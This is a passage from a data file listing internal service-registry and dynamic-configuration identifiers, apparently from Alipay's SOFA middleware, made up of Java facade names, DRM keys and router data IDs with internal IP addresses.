ervice:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.application:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promoorder.common.service.facade.api.PromoOrderRefundFacade:1.0:mrchorder@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.206#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_10.15.234.92#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.custdecision.service.facade.XflushErrorNpeStatisticsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecoqltprod.core.service.eco.EcoSpaceDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoprod.common.service.facade.task.FinTaskManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reservecenter.facade.api.AllocateOrderManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:openexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.common.check.MinitransCheckQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_TRADE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kabaoprod.service.facade.api.UserAssetFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fuelprod.facade.VoucherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcommerceprod.common.service.facade.wireless.CategoryManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.consumecenter.common.service.platform.facade.BillBizEditOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_2110#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.fc.ptcore.common.service.facade.api.catalog.StandardCatalogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-test3twa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.shared.inspect.service.InspectTaskNoticeSubscribeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.126.79#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundprod.common.service.facade.FundTairManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.gmp.openplatform.facade.IdeLoginServiceFacade:1.0:mobile-gmpop-saas-plugin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.speech.card.SecuUserCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpdcenter.facade.model.DummyBlockItemData:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:promobffweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findtprod:name=com.alipay.kmi.client.cache.PgpKeyCacheRefresher.keyName,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publiccore.common.service.facade.template.PublicMsgTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:minitrans_hvtrans@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.insure.AutoInsRemindFacadeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.dynamic.facade.DynamicRelationQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.access.OauthLoginTokenServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.idatacontextTairCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordercore.common.service.facade.order.OrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.cds.ContentDeliveryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acrespackagecore.common.service.facade.ResourcePackageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.237.121#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:antsecurity_uctfront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.ProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csivr.common.service.facade.api.OutcallService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.common.service.tr.caesar.CaesarSnifferService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.ordermng.common.util.drm.ProductLimitedDRM.fastLimitedProducts,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.112.93#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cfpcenter.common.service.facade.specialbusiness.api.CfpSpecialTransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insdataprod.common.service.facade.survey.api.MedicalReceiptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:poseShop0823RiskAuditExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:mobilepromo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbillcenter.facade.service.TurnOvdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.bizlogicide.common.service.facade.api.BizLogicSourceCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ANTLOGMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.97.188#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antfeaturelib.common.facade.service.ScriptMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_collectApplyServiceFacade_hand@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbconfigcenter.common.service.facade.api.ConfigItemManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.antfinancial.antchain.cloud.endpoint.facade.AkdfServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.fininfo:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableJdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pvsofaclient.facade.rest.service.facade.rpc.route.targetzone.TargetZoneRouteRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pfunddts.common.facade.api.ProblemDiagnosisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mappprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.deepinsight.facade.DeepInsightAnalysisTaskFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dockerlabapp:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.debug,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.antscheduler.facade.DssSwitchZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ordermng.common.service.api.task.GroupOrderSystemService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_F_DAYU#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditmarket.game.service.PcreditMarketGameQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.240.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilecodec.component.service.zone.ProcessDispatcherClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.chair-script:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.businessPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.riskmng.common.service.facade.api.RiskBizInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_ASSETXP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finadvisorprod.common.service.facade.mng.TaskManagerFacadeV2:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.amc.service.AmcUserPermissionRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.facade.GlobalCGCPQrCodeSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:alipassprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iamlscan.common.service.query.facade.api.AmlBatchSiftService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.10.0.241#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.rinsight.common.base.script.validate.RinsightScriptValidateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.permlimit.service.facade.GenericPermlimitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.data.process.facade.sql.DataProcessSqlParseService:1.0:dpdataprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.wishTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasecore.service.v2.bag.facade.BagCommonQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.activity.ActivityControlSubtaskDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csmobile.servie.facade.api.PayQuestionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.financemng.biz.shared.allocation.AstAllocTaskManage:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.prodmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpromoprod.common.service.facade.task.TaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.DeveloperManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:instfluxcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimitnear:name=com.alipay.rule.core.engine.config.RuleEngineResource.recordCondCost,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.reservecenter.common.service.facade.api.AccountHistoryDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcepprod.common.service.integration.acctrans.AccTransServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodswitch.common.service.facade.ProductCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.distributor.DistributorTransferInService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settleprod.service.facade.installment.InstallmentConsultService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.core.service.censor.userinfo.CensorUserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.247.244#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.127.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.160.176.239#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cfpcenter:name=com.alipay.cif.drm.PasswordRevokeSwitch.simplePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:subjectDomainRoleJoinProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.RpcSpi:1.0:memberprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.ipmtPreparePayQueue#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.2.210#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.decisionx.engine.common.api.ResourceStatusService:1.0:pucprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.220.158#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.membertangram.common.service.facade.balance.UserBalanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerv2.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iaassettrans.facade.common.voucher.api.AssettransVoucherCommonFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixContains,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.stockassetcore.common.service.facade.api.UserBrokerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opencore.service.facade.app.AppCreateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dadeploymentunit.facade.metadata.api.MetadataBusinessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0:asttshipcoreFluxInstrctionService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exriskcenter.common.service.facade.api.query.TreeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.miniapp.api.AppInfoManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo1#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpInsttradeTairRz.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitysimulate.common.service.client.msgbroker.MsgBrokerListener:1.0:punishcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ALMCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpromoprod.common.service.facade.equity.search.PrizeSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsign.common.service.facade.finauth.service.BridgeAuthFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.DividendFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.security.facade.sw.service.SwitchService:1.0:dpsecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfbsc.facade.api.cashallocation.CashAllocationProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdsmmg.common.service.facade.axel.PaiServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.client.serivce.ExterfaceInvokeService:1.0:inscharityprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.materialcenter.common.service.facade.api.material.BatchRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.common.service.sdk.spi.service.InsIopExterfaceInvokeService:1.0:inshealthprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=midas.record.MidasRecordSwitchDRMControl.recordStatusExpr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.omoaidbase.common.service.facade.api.PermissionControllFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityidentify.service.eworkcard.EWorkCardGuideFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.zpublish.biz.shared.utils.NodeParameters.abroadIdcStrList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S_acxbosscore_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.insmobile:name=com.alipay.insmobile.biz.community.drm.CommunityDrm.richTextModify,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pointmng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.findecision:name=com.alipay.common.security.dresource.SecurityCommonDrm.xssJsonValueFilterEscape,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.payplus.common.service.facade.api.AdvancePayServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_FOREX#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.prodcore.service.api.product.ProductConfigureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxbase.common.scheduler.SchedulerHandler:1.0:composeStrategySchedulerHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprobe.common.service.facade.contractquality.api.parse.ParseService:1.0:global@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:pointcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apyunqing.common.service.facade.application.DataMigrationFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_OYZ_DATA_SYNC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finfundprod.biz.trade.purchase.service.FundPurchaseApplyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.mextitemcenter.common.facade.api.CategoryQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dartkeeper.rm.service.Collector:1.0:collector@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.zpaas.biz.ops.common.ReleaseDrmResource.pauseRelease,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.ProfileConsistQueryService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbwms.common.service.facade.service.WmsWarehouseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.arMessageClosedBeginDate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bizfundprod.common.service.facade.payment.transferremind.TransferRemindNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotone.common.service.api.SendSmsService.sendTemplateSms:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.customscenter.biz.declare.drm.CommonConfig.maxZONGSHUReplyFilesCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cashier:name=com.alipay.cashier.common.service.integration.drm.resource.AntEventContextResource.sPhaseStandardCfg,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinsnsprod.service.facade.api.video.VideoContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.internal.LocalCacheOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.kernel.common.service.facade.NoticeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaprod.common.service.fundentry.OperateReviewQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.LoanRepayRemindDrmResource.maxId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.merchant.common.service.facade.OrderPageQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_G_WKCTU#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.scardcenter.common.service.facade.CertServiceSpiFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.239#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dwdsds.common.service.facade.audit.QueryAuditInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetcore.common.service.assetcore.zcb.facade.P2pStatisticsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linkw.common.service.facade.OneKeyDeployFacade:1.0:unitestcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-antlogmng-three-notify-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cifcommon.business.platform.enterprise.facade.EntProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestprod.core.service.facade.RecordReplayServerTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradeexprod.common.service.facade.DirectionalPayService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.160.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.etetestcore.service.api.YuemaContentDeliveryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.unCompress:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.dont-load-plugin:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.globalTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_ZTI#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.lifemng.apaylifeDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cdp.common.service.facade.space.api.CdpSpaceRuleApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipaymember.common.service.facade.config.service.BrandZoneConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue9#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.paymentmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixRegex,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tdlib.common.manager.facade.ApdidOdpsQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.admin.AppInfoAuditQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocore.common.manager.facade.CampRelationQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_REVCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilebc.common.service.facade.activity.AntiShakeActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.isupergwmng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbcontent.common.service.facade.api.feed.FeedQueryForManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.riskdatacenter.service.facade.hpa.EmergencyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.linka:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckPayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opencore.service.facade.app.AppRelationQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngTairCache.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finzyprod.facade.loan.api.ZyContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.ldc.demo.TestService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:overseaprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.25.244.227#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA-SCHEDULER-S-S-insautomarket-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mcardcenter.common.service.facade.McardTemplateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:voucherprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.rec.api.RecLabelQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.refund.RefundQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.csactive.common.service.facade.api.EventMessageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.pointmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.afsc.common.service.amc.service.AmcLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecashier.service.facade.spi.CashierActivityCallbackFacade:1.0:ebpppro